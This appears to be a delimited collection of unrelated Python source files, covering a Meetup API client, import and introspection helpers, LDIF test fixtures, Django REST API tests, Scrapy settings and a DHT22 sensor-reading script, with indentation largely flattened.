def join_group(self, group_url, membership_answers=None):
''' a method to add member to a meetup group
:param group_url: string with meetup urlname for group
:param membership_answers: list with question id and answer for group join questions
:return: dictionary with member profile details inside [json] key
profile_details = self._reconstruct_member({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/#create
title = '%s.join_group' % self.__class__.__name__
# validate permissions
if not 'group_join' in self.service_scope:
raise ValueError('%s requires group_join as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'membership_answers': membership_answers
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members' % (self.endpoint, group_url)
params = {}
if membership_answers:
for answer in membership_answers:
key = 'answer_%s' % str(answer['question_id'])
params[key] = answer['answer_text']
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_member(response_details['json'])
return response_details
def leave_group(self, group_url, member_id, exit_comment=''):
''' a method to remove group from meetup member profile
:param group_url: string with meetup urlname for group
:param member_id: integer with member id from member profile
:param exit_comment: string with comment to leave with organizer
:return: dictionary with code 204 on success
'''
# https://www.meetup.com/meetup_api/docs/:urlname/members/:member_id/#delete
title = '%s.leave_group' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
raise ValueError('%s requires profile_edit as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'member_id': member_id,
'exit_comment': exit_comment
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/members/%s' % (self.endpoint, group_url, str(member_id))
params = {}
if exit_comment:
params['exit_comment'] = exit_comment
# send request
response_details = self._delete_request(url, params=params)
return response_details
def join_topics(self, member_id, topics):
''' a method to add topics to member profile details on meetup
:param member_id: integer with member id from member profile
:param topics: list of integer meetup ids for topics
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.join_topics' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
            raise ValueError('%s requires profile_edit as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'member_id': member_id,
'topics': topics
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/%s' % (self.endpoint, member_id)
params = {
'add_topics': ','.join(str(x) for x in topics),
'fields': 'topics'
}
# send requests
response_details = self._patch_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# parse response
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def leave_topics(self, member_id, topics):
''' a method to remove topics from member profile details on meetup
:param member_id: integer with member id from member profile
:param topics: list of integer meetup ids for topics
:return: dictionary with list of topic details inside [json] key
topic_details = self.objects.topic.schema
'''
# https://www.meetup.com/meetup_api/docs/members/:member_id/#edit
title = '%s.leave_topics' % self.__class__.__name__
# validate permissions
if not 'profile_edit' in self.service_scope:
            raise ValueError('%s requires profile_edit as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'member_id': member_id,
'topics': topics
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/members/%s' % (self.endpoint, member_id)
params = {
'remove_topics': ','.join(str(x) for x in topics),
'fields': 'topics'
}
# send requests
response_details = self._patch_request(url, params=params)
# construct method output dictionary
member_topics = {
'json': []
}
for key, value in response_details.items():
if not key == 'json':
member_topics[key] = value
# construct method output
if response_details['json']:
if 'topics' in response_details['json'].keys():
for topic in response_details['json']['topics']:
member_topics['json'].append(self.objects.topic.ingest(**topic))
return member_topics
def join_event(self, group_url, event_id, additional_guests=0, attendance_answers=None, payment_service='', payment_code=''):
''' a method to create an rsvp for a meetup event
:param group_url: string with meetup urlname for group
:param event_id: integer with meetup id for event
:param additional_guests: [optional] integer with number of additional guests
:param attendance_answers: [optional] list with id & answer for event survey questions
:param payment_service: [optional] string with name of payment service to use
:param payment_code: [optional] string with token to authorize payment
:return: dictionary with attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/
title = '%s.join_event' % self.__class__.__name__
# validate permissions
if not 'rsvp' in self.service_scope:
            raise ValueError('%s requires rsvp as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id,
'additional_guests': additional_guests,
'attendance_answers': attendance_answers,
'payment_service': payment_service,
'payment_code': payment_code
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, event_id)
params = {
'response': 'yes'
}
if additional_guests:
params['guests'] = additional_guests
if attendance_answers:
for answer in attendance_answers:
key = 'answer_%s' % str(answer['question_id'])
params[key] = answer['answer_text']
if payment_service:
params['agree_to_refund'] = True
params['opt_to_pay'] = True
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_attendee(response_details['json'])
return response_details
def leave_event(self, group_url, event_id):
''' a method to rescind an rsvp to a meetup event
:param group_url: string with meetup urlname for group
:param event_id: integer with meetup id for event
:return: dictionary with attendee details inside [json] key
attendee_details = self._reconstruct_attendee({})
'''
# https://www.meetup.com/meetup_api/docs/:urlname/events/:event_id/rsvps/
title = '%s.leave_event' % self.__class__.__name__
# validate permissions
if not 'rsvp' in self.service_scope:
            raise ValueError('%s requires rsvp as part of oauth2 service_scope permissions.' % title)
# validate inputs
input_fields = {
'group_url': group_url,
'event_id': event_id
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# construct request fields
url = '%s/%s/events/%s/rsvps' % (self.endpoint, group_url, event_id)
params = {
'response': 'no'
}
# send request
response_details = self._post_request(url, params=params)
# construct method output
if response_details['json']:
response_details['json'] = self._reconstruct_attendee(response_details['json'])
return response_details
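# Illustrative usage sketch (not part of the original module). It assumes you
# already hold a valid OAuth2 access token obtained through
# labpack.authentication.oauth2.oauth2Client; the token below is a placeholder.
if __name__ == '__main__':
    meetup_client = meetupClient(
        access_token='replace-with-a-real-oauth2-token',
        service_scope=['basic']
    )
    # retrieve the authenticated member's brief profile; with a placeholder
    # token the Meetup API responds with an error captured in the output dict
    profile_brief = meetup_client.get_member_brief()
    print(profile_brief['code'], profile_brief['error'] or profile_brief['json'])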
|
"""
module: tools for python modules
Corey Rayburn Yung <coreyrayburnyung@gmail.com>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
Contents:
ToDo:
Add functions for getting and naming module-level variables.
"""
from __future__ import annotations
import importlib
from importlib import util
import inspect
import pathlib
import sys
import types
from typing import Any, Optional, Type, Union
import denovo
""" Introspection Tools """
def get_classes(module: types.ModuleType,
include_private: bool = False) -> list[Type[Any]]:
"""Returns list of classes in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
list[Type[Any]]: list of classes in 'module'.
"""
classes = [m[1] for m in inspect.getmembers(module, inspect.isclass)
if m[1].__module__ == module.__name__]
if not include_private:
classes = denovo.modify.drop_privates(item = classes)
return classes
def get_functions(module: types.ModuleType,
include_private: bool = False) -> list[types.FunctionType]:
"""Returns list of functions in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
        list[types.FunctionType]: list of functions in 'module'.
"""
functions = [m[1] for m in inspect.getmembers(module, inspect.isfunction)
if m[1].__module__ == module.__name__]
if not include_private:
functions = denovo.modify.drop_privates(item = functions)
return functions
def name_classes(module: types.ModuleType,
include_private: bool = False) -> list[str]:
"""Returns list of string names of classes in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
        list[str]: list of string names of classes in 'module'.
"""
classes = [m[0] for m in inspect.getmembers(module, inspect.isclass)
if m[1].__module__ == module.__name__]
if not include_private:
classes = denovo.modify.drop_privates(item = classes)
return classes
def name_functions(module: types.ModuleType,
include_private: bool = False) -> list[str]:
"""Returns list of string names of functions in 'module'.
Args:
module (types.ModuleType): module to inspect.
include_private (bool): whether to include items that begin with '_'
(True) or to exclude them (False).
Returns:
        list[str]: list of string names of functions in 'module'.
"""
functions = [m[0] for m in inspect.getmembers(module, inspect.isfunction)
if m[1].__module__ == module.__name__]
if not include_private:
functions = denovo.modify.drop_privates(item = functions)
return functions
""" Conversion Tools """
def from_file_path(path: Union[pathlib.Path, str],
name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from file path at 'name'.
Args:
path (Union[pathlib.Path, str]): file path of module to load.
name (Optional[str]): name to store module at in 'sys.modules'. If it
is None, the stem of 'path' is used. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
if isinstance(path, str):
path = pathlib.Path(path)
if name is None:
name = path.stem
    spec = util.spec_from_file_location(name, path)
    if spec is None or spec.loader is None:
        raise ImportError(f'Failed to create spec from {path}')
    # create the module, register it under 'name', and execute it so that its
    # attributes are populated before it is returned
    module = util.module_from_spec(spec)
    sys.modules[name] = module
    spec.loader.exec_module(module)
    return module
def from_import_path(path: str, name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from import path at 'name'.
Args:
        path (str): dotted import path of module to load.
        name (Optional[str]): name to store module at in 'sys.modules'. If it
            is None, the module is not added to 'sys.modules'. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
if '.' in path:
parts = path.split('.')
module = parts.pop(-1)
package = '.'.join(parts)
try:
imported = importlib.import_module(module, package = package)
except (AttributeError, ImportError, ModuleNotFoundError):
try:
imported = importlib.import_module('.' + module,
package = package)
except (AttributeError, ImportError, ModuleNotFoundError):
imported = importlib.import_module(path)
else:
imported = importlib.import_module(path)
if name is not None:
sys.modules[name] = imported
return imported
def from_path(path: Union[str, pathlib.Path],
name: Optional[str] = None) -> types.ModuleType:
"""Imports and returns module from import or file path at 'name'.
Args:
path (Union[pathlib.Path, str]): import or file path of module to load.
name (Optional[str]): name to store module at in 'sys.modules'. If it
is None, the stem of 'path' is used. Defaults to None.
Returns:
types.ModuleType: imported module.
"""
    if isinstance(path, pathlib.Path) or '\\' in path or '/' in path:
operation = from_file_path
else:
operation = from_import_path # type: ignore
return operation(path = path, name = name)
""" Private Methods """
# def _safe_import(path: str) -> types.ModuleType:
# print('test path safe', path)
# if path in sys.modules:
# return sys.modules[path]
# else:
# try:
# return importlib.import_module(path)
# except AttributeError:
# print('test att error')
# if '.' in path:
# parts = path.split('.')
# item = parts[-1]
# del parts[-1]
# new_path = '.' + '.'.join(parts)
# module = importlib.import_module(new_path)
# return getattr(module, item)
# else:
# raise ImportError(f'{path} could not be imported')
# def _parse_import_path(path: str) -> tuple[Optional[str], Optional[str], str]:
# package = = None
# if '.' in path:
# parts = path.split('.')
# if len(parts) == 1:
# module = parts.pop(-1)
# package = parts[0]
# # If there are only two parts, it is impossible at this stage to know
# # if the two parts are package/module or module/item. So, any call to
# # this function should not assume that it is module/item as the returned
# # data might indicate.
# elif len(parts) > 1:
# module = parts.pop(-1)
# package = '.'.join(parts)
# else:
# module = path
# return package, module
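# Illustrative usage sketch (not part of the original module): load the standard
# library 'json' module through from_path and list its function names.
# include_private = True is used here to sidestep the denovo.modify dependency
# in this quick demonstration.
if __name__ == '__main__':
    loaded = from_path('json')
    print(name_functions(loaded, include_private = True))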
|
BYTES = b"""version: 1
dn: cn=Alice Alison,
 mail=alicealison@example.com
objectclass: top
objectclass: person
objectclass: organizationalPerson
cn: Alison Alison
mail: alicealison@example.com
modifytimestamp: 4a463e9a
# another person
dn: mail=foobar@example.org
objectclass: top
objectclass: person
mail: foobar@example.org
modifytimestamp: 4a463e9a
"""
BYTES_SPACE = b"\n\n".join([block + b"\n" for block in BYTES.split(b"\n\n")])
BYTES_OUT = b"""dn: cn=Alice Alison,mail=alicealison@example.com
cn: Alison Alison
mail: alicealison@example.com
modifytimestamp: 4a463e9a
objectclass: top
objectclass: person
objectclass: organizationalPerson
dn: mail=foobar@example.org
mail: foobar@example.org
modifytimestamp: 4a463e9a
objectclass: top
objectclass: person
"""
BYTES_EMPTY_ATTR_VALUE = b"""dn: uid=foo123,dc=ws1,dc=webhosting,o=eim
uid: foo123
domainname: foo.bar
homeDirectory: /foo/bar.local
aliases:
aliases: foo.bar
"""
LINES = [
b"version: 1",
b"dn: cn=Alice Alison,mail=alicealison@example.com",
b"objectclass: top",
b"objectclass: person",
b"objectclass: organizationalPerson",
b"cn: Alison Alison",
b"mail: alicealison@example.com",
b"modifytimestamp: 4a463e9a",
b"",
b"dn: mail=foobar@example.org",
b"objectclass: top",
b"objectclass: person",
b"mail: foobar@example.org",
b"modifytimestamp: 4a463e9a",
]
BLOCKS = [
[
b"version: 1",
b"dn: cn=Alice Alison,mail=alicealison@example.com",
b"objectclass: top",
b"objectclass: person",
b"objectclass: organizationalPerson",
b"cn: Alison Alison",
b"mail: alicealison@example.com",
b"modifytimestamp: 4a463e9a",
],
[
b"dn: mail=foobar@example.org",
b"objectclass: top",
b"objectclass: person",
b"mail: foobar@example.org",
b"modifytimestamp: 4a463e9a",
],
]
DNS = ["cn=Alice Alison,mail=alicealison@example.com", "mail=foobar@example.org"]
CHANGETYPES = [None, None]
RECORDS = [
{
"cn": ["Alison Alison"],
"mail": ["alicealison@example.com"],
"modifytimestamp": ["4a463e9a"],
"objectclass": ["top", "person", "organizationalPerson"],
},
{
"mail": ["foobar@example.org"],
"modifytimestamp": ["4a463e9a"],
"objectclass": ["top", "person"],
},
]
URL = b"https://tools.ietf.org/rfc/rfc2849.txt"
URL_CONTENT = "The LDAP Data Interchange Format (LDIF)"
|
from django.contrib.auth import get_user_model
from minemaphelper.minemap.models import World, MinecraftMap
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase, URLPatternsTestCase
class WorldTests(APITestCase):
def setUp(self):
self.user = get_user_model()(username='staff')
self.user.set_password('staffword')
self.user.save()
def test_list_worlds(self):
url = reverse('world-list')
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 0)
def test_create_world_forbidden_when_anonymous(self):
url = reverse('world-list')
data = {'name': 'World', 'private': True}
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_world_when_authenticated(self):
url = reverse('world-list')
data = {'name': 'World', 'private': True}
self.assertTrue(self.client.login(username='staff', password='staffword'))
response = self.client.post(url, data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(response.data, {'pk': 1, 'name': 'World', 'private': True})
def test_access_private_world_when_anonymous(self):
self.test_create_world_when_authenticated()
self.client.logout()
url = reverse('world-detail', kwargs={'pk': 1})
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
class MapListTests(APITestCase):
def setUp(self):
self.private_world = World.objects.create(name='Test world', private=True)
self.public_world = World.objects.create(name='Public test world', private=False)
self.test_user = get_user_model().objects.create(username='testuser')
self.test_user.set_password('testpassword')
self.test_user.save(update_fields=['password'])
self.test_user2 = get_user_model().objects.create(username='testuser2')
self.private_world.users.add(self.test_user)
self.public_world.users.add(self.test_user)
def tearDown(self):
self.private_world.delete()
self.public_world.delete()
self.test_user.delete()
self.test_user2.delete()
def test_list_maps_unauthenticated_for_private_world_fails(self):
url = reverse('map-list', args=[self.private_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_list_maps_unauthenticated_for_public_world_succeeds(self):
url = reverse('map-list', args=[self.public_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_private_world_succeeds(self):
self.assertTrue(self.client.login(username='testuser', password='testpassword'))
        url = reverse('map-list', args=[self.private_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_public_world_succeeds(self):
self.assertTrue(self.client.login(username='testuser', password='testpassword'))
url = reverse('map-list', args=[self.public_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_list_maps_authenticated_for_invalid_private_world_fails(self):
self.client.force_authenticate(self.test_user2)
url = reverse('map-list', args=[self.private_world.pk])
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class MapDetailTests(APITestCase):
def setUp(self):
self.private_world = World.objects.create(name='Test world', private=True)
self.public_world = World.objects.create(name='Public test world', private=False)
self.good_user = get_user_model().objects.create(username='testuser')
self.bad_user = get_user_model().objects.create(username='testuser2')
self.private_world.users.add(self.good_user)
self.public_world.users.add(self.good_user)
self.map_priv_0_0_0 = MinecraftMap.objects.create(
world=self.private_world,
zoom=0, x=0, z=0,
map=1
)
def tearDown(self):
self.private_world.delete()
self.public_world.delete()
self.good_user.delete()
self.bad_user.delete()
    def test_detailed_map_non_existent_fails(self):
url = reverse('map-detail', args=[
self.private_world.pk,
self.map_priv_0_0_0.zoom,
self.map_priv_0_0_0.z,
self.map_priv_0_0_0.x,
])
print(url)
class MarkerTests(APITestCase):
pass
|
# -*- coding: utf-8 -*-
# Config Django web project
# import os
# import sys
# BASE_DIR = os.path.dirname(__file__)
# WEB_DIR = os.path.join(BASE_DIR, 'web')
# sys.path.append(WEB_DIR)
# os.environ['DJANGO_SETTINGS_MODULE'] = 'web.settings'
# Config Scrapy
BOT_NAME = 'pyjobs'
SPIDER_MODULES = ['pyjobs.spiders']
NEWSPIDER_MODULE = 'pyjobs.spiders'
ITEM_PIPELINES = {
'scrapy_mongodb.MongoDBPipeline': 0,
}
# Config MongoDB
MONGODB_URI = 'mongodb://localhost:27017'
MONGODB_DATABASE = 'pyjobs'
MONGODB_COLLECTION = 'jobs'
MONGODB_UNIQUE_KEY = 'uid'
|
#!/usr/bin/env python3
import sys
from time import sleep
import adafruit_dht
import board
dhtDevice = adafruit_dht.DHT22(board.D4)
max_number_of_reads = 50 # max reads attempted before exit(1)
good_reads_required = 2 # take the n-th successful read and stop trying
pause_between_reads = 3 # in seconds
f_val = ""
good_reads = 0
for i in range(max_number_of_reads):
try:
f_val = "{0:0.1f} {1:0.1f}".format(dhtDevice.temperature, dhtDevice.humidity)
print("measure {}: {}".format(i + 1, f_val), file=sys.stderr)
good_reads += 1
if good_reads >= good_reads_required:
print(f_val)
sys.exit()
except RuntimeError as error:
        # Errors happen fairly often, DHTs are hard to read, just keep going
print("measure {}: {}".format(i + 1, error.args[0]), file=sys.stderr)
sleep(pause_between_reads)
sys.exit(1)
|